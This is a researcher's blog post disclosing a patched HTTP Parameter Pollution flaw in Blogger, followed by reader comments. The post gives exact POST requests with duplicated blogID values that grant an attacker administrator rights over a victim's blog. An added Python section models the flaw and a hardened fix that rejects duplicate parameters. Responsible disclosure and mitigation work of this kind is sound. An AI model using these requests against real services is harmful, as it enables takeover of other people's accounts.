Hi,
This is the first post on my blog, and also my first post about my vulnerability findings in the Google Reward Program.
In the last 2 months I participated in the Google reward program and found some High and Serious vulnerabilities.
(First, I want to mention that Google has the best professional, brilliant security team. It is amazing how much Google cares about security and what an amazing job they do securing their sites. Thanks Adam and the Google Security Team for giving me the chance to show my skills :))
The vulnerability I want to share first is a critical vulnerability in Blogger (a Google service).
That vulnerability could be used by an attacker to get administrator privileges over any Blogger account (a permission issue).
Yes, I know it sounds kind of crazy, but it's true :)
Here are the details of the issue in the Blogger service.
I found an HTTP Parameter Pollution (HPP) vulnerability in Blogger that allows an attacker to add himself as an administrator of the victim's Blogger account.
Technical details:
Here are the steps for getting admin control permissions over any Blogger account.
1.
The attacker uses the invite-author option in Blogger (Add Authors):
Vulnerability location:
POST /add-authors.do HTTP/1.1
Request:
security_token=attackertoken&blogID=attackerblogidvalue&blogID=victimblogidvalue&authorsList=goldshlager19test%40gmail.com(attacker email)&ok=Invite
As you can see, I added two blogID values to my POST request (blogID=attackerblogidvalue&blogID=victimblogidvalue).
The server checks the first blogID value (the attacker's own blog, which passes the ownership check) but executes the action against the second blogID value (the victim's blog).
2.
After that, the attacker receives an email to confirm him as an author (the author invitation link).
Once the invitation is accepted, the attacker is added as an author on the victim's account.
3.
At this step it becomes possible to modify the attacker's permission from author to administrator, using the same duplicated blogID parameter:
Vulnerability Location:
POST /team-member-modify.do HTTP/1.1
Request:
security_token=attackertoken&blogID=attackerownblogid&blogID=victimblogidvalue&memberID=attackermemberid&isAdmin=true&ok=Grant+admin+privileges
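As an added illustration (not Blogger's code, and not part of the original post), the following Python models the flaw described in steps 1 and 3, where the ownership check reads the first blogID while the action uses the last one, beside a hardened handler that rejects duplicated parameters before checking anything. The blog names, owners and request body are constructed for the example.

```python
from urllib.parse import parse_qs, parse_qsl

# Constructed sample data: which caller owns which blog (not real Blogger data).
BLOG_OWNERS = {"attackerblog": "attacker", "victimblog": "victim"}

# Constructed request body modelled on the team-member-modify request in the post.
POLLUTED_BODY = ("security_token=tok&blogID=attackerblog&blogID=victimblog"
                 "&memberID=m1&isAdmin=true&ok=Grant+admin+privileges")


def vulnerable_grant_admin(body, caller):
    """Models the flawed pattern: the authorization check reads the first
    blogID, but the privilege change is applied to the last blogID."""
    params = parse_qs(body)
    first_blog = params["blogID"][0]   # value the ownership check looks at
    last_blog = params["blogID"][-1]   # value the action is applied to
    if BLOG_OWNERS.get(first_blog) != caller:
        return ("denied", None)
    # The change lands on a blog that was never checked against the caller.
    return ("granted", last_blog)


def hardened_grant_admin(body, caller):
    """Reject any repeated parameter up front, then check and act on the
    single remaining blogID so the two code paths can never diverge."""
    seen = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key in seen:
            return ("rejected", "duplicate parameter: " + key)
        seen[key] = value
    blog = seen.get("blogID")
    if blog is None or BLOG_OWNERS.get(blog) != caller:
        return ("denied", None)
    return ("granted", blog)
```

Logging the "rejected" outcome gives a simple detection signal, since a legitimate client never sends the same parameter twice on these endpoints.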
And?
PoC Video:
Full video download: http://www.2shared.com/file/90mjfuab/Blogger_Get_Administrator_priv.html
(The vulnerability mentioned here has been confirmed patched by the Google Security Team very fast.)
Best Regards,
Nir Goldshlager
16 comments:
Is this patched? I tried it but can't get anything but a 404 when I tamper with the add-authors request.
Very impressive
Keep up the good work!
Thanks for reporting this issue to us privately. Blogger quickly fixed the problem a few months ago.
Good work & gl with your new blog.
Anatoli
great job again from Avnet pen team
(The vulnerability mentioned here has been confirmed patched (very fast) by the Google Security Team a few months ago.)
Truly one of the first live HPP proofs of concept.
Way to go!
Nice!
Good idea, Nil.
Good work, a useful example of how an attacker can exploit other applications affected by this vulnerability.
Nice work... HPP is really a great technique.
But you still didn't manage to bypass Comitari Web Protection Suite ;-)
Keep posting these interesting findings...
I'm a newbie and trying to do as you did but not successfully :(
How can I make you part of my team?
Security is the name of my purpose in contacting you: especially social networked profiles, to keep forward on a project. I am an art entity (I call myself like that, to avoid political noise when defining "Artist" or worse: "female artist"); some pages about it in Facebook: Art in Hers, Galeria de Originales, Poesia. Twitter accounts are @imprimattura, @artistcoatl, @textualart; other accounts include a number of blogs, parked websites, and unpublished materials. Kind of paralyzed because of security (I've already been attacked and want to protect futures). I wish you get interested in this: I want to innovate, make a cloud installation, publish a different kind of poetry book. Best wishes are to take pirates out and start making a profit.
Epic work man!! I'm glad we're on the same team ;-)
Ya, really awesome!! Hats off to you!!!
Good information here. I will post this information to my Facebook page. It is really very informative for others.